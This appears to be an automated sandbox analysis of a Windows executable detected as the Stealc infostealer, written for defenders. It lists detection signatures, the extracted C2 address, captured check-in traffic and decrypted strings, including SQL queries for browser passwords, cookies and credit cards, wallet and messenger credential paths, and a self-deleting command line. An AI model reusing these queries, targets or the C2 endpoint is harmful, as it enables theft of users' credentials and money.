Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546478
MD5: 43deae52c429449144c488c4ea074c14
SHA1: 2496e112cf08e1584a15d65409d84936f3c8b7f9
SHA256: bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4024 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 43DEAE52C429449144C488C4EA074C14)
  • cleanup
Malware configuration (extracted): {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

YARA matches in network traffic (dump.pcap)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

YARA matches in memory dumps

Source | Rule | Description | Author
00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 4024 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 4024 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

YARA matches in unpacked PE files

Source | Rule | Description | Author
0.2.file.exe.680000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T00:38:04.204405+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.680000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.680000.0.unpack | String decryptor: decrypted strings recovered from the unpacked sample, one per line:
    INSERT_KEY_HERE
    30
    11
    20
    24
    GetProcAddress
    LoadLibraryA
    lstrcatA
    OpenEventA
    CreateEventA
    CloseHandle
    Sleep
    GetUserDefaultLangID
    VirtualAllocExNuma
    VirtualFree
    GetSystemInfo
    VirtualAlloc
    HeapAlloc
    GetComputerNameA
    lstrcpyA
    GetProcessHeap
    GetCurrentProcess
    lstrlenA
    ExitProcess
    GlobalMemoryStatusEx
    GetSystemTime
    SystemTimeToFileTime
    advapi32.dll
    gdi32.dll
    user32.dll
    crypt32.dll
    ntdll.dll
    GetUserNameA
    CreateDCA
    GetDeviceCaps
    ReleaseDC
    CryptStringToBinaryA
    sscanf
    VMwareVMware
    HAL9TH
    JohnDoe
    DISPLAY
    %hu/%hu/%hu
    http://185.215.113.206
    bksvnsj
    /6c4adf523b719729.php
    /746f34465cf17784/
    tale
    GetEnvironmentVariableA
    GetFileAttributesA
    GlobalLock
    HeapFree
    GetFileSize
    GlobalSize
    CreateToolhelp32Snapshot
    IsWow64Process
    Process32Next
    GetLocalTime
    FreeLibrary
    GetTimeZoneInformation
    GetSystemPowerStatus
    GetVolumeInformationA
    GetWindowsDirectoryA
    Process32First
    GetLocaleInfoA
    GetUserDefaultLocaleName
    GetModuleFileNameA
    DeleteFileA
    FindNextFileA
    LocalFree
    FindClose
    SetEnvironmentVariableA
    LocalAlloc
    GetFileSizeEx
    ReadFile
    SetFilePointer
    WriteFile
    CreateFileA
    FindFirstFileA
    CopyFileA
    VirtualProtect
    GetLogicalProcessorInformationEx
    GetLastError
    lstrcpynA
    MultiByteToWideChar
    GlobalFree
    WideCharToMultiByte
    GlobalAlloc
    OpenProcess
    TerminateProcess
    GetCurrentProcessId
    gdiplus.dll
    ole32.dll
    bcrypt.dll
    wininet.dll
    shlwapi.dll
    shell32.dll
    psapi.dll
    rstrtmgr.dll
    CreateCompatibleBitmap
    SelectObject
    BitBlt
    DeleteObject
    CreateCompatibleDC
    GdipGetImageEncodersSize
    GdipGetImageEncoders
    GdipCreateBitmapFromHBITMAP
    GdiplusStartup
    GdiplusShutdown
    GdipSaveImageToStream
    GdipDisposeImage
    GdipFree
    GetHGlobalFromStream
    CreateStreamOnHGlobal
    CoUninitialize
    CoInitialize
    CoCreateInstance
    BCryptGenerateSymmetricKey
    BCryptCloseAlgorithmProvider
    BCryptDecrypt
    BCryptSetProperty
    BCryptDestroyKey
    BCryptOpenAlgorithmProvider
    GetWindowRect
    GetDesktopWindow
    GetDC
    CloseWindow
    wsprintfA
    EnumDisplayDevicesA
    GetKeyboardLayoutList
    CharToOemW
    wsprintfW
    RegQueryValueExA
    RegEnumKeyExA
    RegOpenKeyExA
    RegCloseKey
    RegEnumValueA
    CryptBinaryToStringA
    CryptUnprotectData
    SHGetFolderPathA
    ShellExecuteExA
    InternetOpenUrlA
    InternetConnectA
    InternetCloseHandle
    InternetOpenA
    HttpSendRequestA
    HttpOpenRequestA
    InternetReadFile
    InternetCrackUrlA
    StrCmpCA
    StrStrA
    StrCmpCW
    PathMatchSpecA
    GetModuleFileNameExA
    RmStartSession
    RmRegisterResources
    RmGetList
    RmEndSession
    sqlite3_open
    sqlite3_prepare_v2
    sqlite3_step
    sqlite3_column_text
    sqlite3_finalize
    sqlite3_close
    sqlite3_column_bytes
    sqlite3_column_blob
    encrypted_key
    PATH
    C:\ProgramData\nss3.dll
    NSS_Init
    NSS_Shutdown
    PK11_GetInternalKeySlot
    PK11_FreeSlot
    PK11_Authenticate
    PK11SDR_Decrypt
    C:\ProgramData\
    SELECT origin_url, username_value, password_value FROM logins
    browser:
    profile:
    url:
    login:
    password:
    Opera
    OperaGX
    Network
    cookies
    .txt
    SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
    TRUE
    FALSE
    autofill
    SELECT name, value FROM autofill
    history
    SELECT url FROM urls LIMIT 1000
    cc
    SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
    name:
    month:
    year:
    card:
    Cookies
    Login Data
    Web Data
    History
    logins.json
    formSubmitURL
    usernameField
    encryptedUsername
    encryptedPassword
    guid
    SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
    SELECT fieldname, value FROM moz_formhistory
    SELECT url FROM moz_places LIMIT 1000
    cookies.sqlite
    formhistory.sqlite
    places.sqlite
    plugins
    Local Extension Settings
    Sync Extension Settings
    IndexedDB
    Opera Stable
    Opera GX Stable
    CURRENT
    chrome-extension_
    _0.indexeddb.leveldb
    Local State
    profiles.ini
    chrome
    opera
    firefox
    wallets
    %08lX%04lX%lu
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName
    x32
    x64
    %d/%d/%d %d:%d:%d
    HARDWARE\DESCRIPTION\System\CentralProcessor\0
    ProcessorNameString
    SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    DisplayName
    DisplayVersion
    Network Info:
    - IP: IP?
    - Country: ISO?
    System Summary:
    - HWID:
    - OS:
    - Architecture:
    - UserName:
    - Computer Name:
    - Local Time:
    - UTC:
    - Language:
    - Keyboards:
    - Laptop:
    - Running Path:
    - CPU:
    - Threads:
    - Cores:
    - RAM:
    - Display Resolution:
    - GPU:
    User Agents:
    Installed Apps:
    All Users:
    Current User:
    Process List:
    system_info.txt
    freebl3.dll
    mozglue.dll
    msvcp140.dll
    nss3.dll
    softokn3.dll
    vcruntime140.dll
    \Temp\
    .exe
    runas
    open
    /c start
    %DESKTOP%
    %APPDATA%
    %LOCALAPPDATA%
    %USERPROFILE%
    %DOCUMENTS%
    %PROGRAMFILES%
    %PROGRAMFILES_86%
    %RECENT%
    *.lnk
    files
    \discord\
    \Local Storage\leveldb\CURRENT
    \Local Storage\leveldb
    \Telegram Desktop\
    key_datas
    D877F783D5D3EF8C*
    map*
    A7FDF864FBC10B77*
    A92DAA6EA6F891F2*
    F8806DD0C461824F*
    Telegram
    Tox
    *.tox
    *.ini
    Password
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
    00000001
    00000002
    00000003
    00000004
    \Outlook\accounts.txt
    Pidgin
    \.purple\
    accounts.xml
    dQw4w9WgXcQ
    token:
    Software\Valve\Steam
    SteamPath
    \config\
    ssfn*
    config.vdf
    DialogConfig.vdf
    DialogConfigOverlay*.vdf
    libraryfolders.vdf
    loginusers.vdf
    \Steam\
    sqlite3.dll
    browsers
    done
    soft
    \Discord\tokens.txt
    /c timeout /t 5 & del /f /q "
    " & del "C:\ProgramData\*.dll"" & exit
    C:\Windows\system32\cmd.exe
    https
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.680000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.680000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.680000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.680000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.680000.0.unpackString decryptor: build
                Source: 0.2.file.exe.680000.0.unpackString decryptor: token
                Source: 0.2.file.exe.680000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.680000.0.unpackString decryptor: file
                Source: 0.2.file.exe.680000.0.unpackString decryptor: message
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.680000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00699030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0068A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006872A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0068A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0068C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00681710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00693B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DF10

                Networking

                barindex
                Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
                Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_006862D0
                Source: unknown HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
                Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpN
                Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpfh
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
                Source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                Source: file.exe Static PE information: section name:
                Source: file.exe Static PE information: section name: .rsrc
                Source: file.exe Static PE information: section name: .idata
                Source: file.exe Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C0098 0_2_006C0098
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B2138 0_2_006B2138
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DB198 0_2_006DB198
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B4E14B 0_2_00B4E14B
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EE258 0_2_006EE258
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0099720E 0_2_0099720E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C4288 0_2_006C4288
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EF3C0 0_2_009EF3C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD73CB 0_2_00AD73CB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070B308 0_2_0070B308
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ADC305 0_2_00ADC305
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FD39E 0_2_006FD39E
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C9489 0_2_009C9489
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006A4573 0_2_006A4573
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006AE544 0_2_006AE544
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C45A8 0_2_006C45A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006ED5A8 0_2_006ED5A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FA648 0_2_006FA648
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007096FD 0_2_007096FD
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C66C8 0_2_006C66C8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA6645 0_2_00AA6645
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DD720 0_2_006DD720
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F6799 0_2_006F6799
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D4868 0_2_006D4868
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E88CB 0_2_009E88CB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EF8D6 0_2_006EF8D6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3281C 0_2_00A3281C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DB8A8 0_2_006DB8A8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ADA86A 0_2_00ADA86A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D98B8 0_2_006D98B8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A979D6 0_2_00A979D6
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AE1A03 0_2_00AE1A03
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A94BD3 0_2_00A94BD3
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E8BD9 0_2_006E8BD9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F4BA8 0_2_006F4BA8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F0B88 0_2_006F0B88
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FAC28 0_2_006FAC28
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA7C2A 0_2_00BA7C2A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009C1C09 0_2_009C1C09
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006DBD68 0_2_006DBD68
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006B1D78 0_2_006B1D78
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD8D99 0_2_00AD8D99
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006EAD38 0_2_006EAD38
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D4DC8 0_2_006D4DC8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B9FD7B 0_2_00B9FD7B
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006D5DB9 0_2_006D5DB9
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C8E78 0_2_006C8E78
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ADDE9C 0_2_00ADDE9C
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F1EE8 0_2_006F1EE8
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEBFDB 0_2_00AEBFDB
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B6AF6E 0_2_00B6AF6E
                Source: C:\Users\user\Desktop\file.exe Code function: String function: 00684610 appears 316 times
                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
                Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00699790
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00693970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00693970
                Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3TZGWVHC.htm
                Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe Static file information: File size 2123776 > 1048576
                Source: file.exe Static PE information: Raw size of fozyxqhw is bigger than: 0x100000 < 0x19b600

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
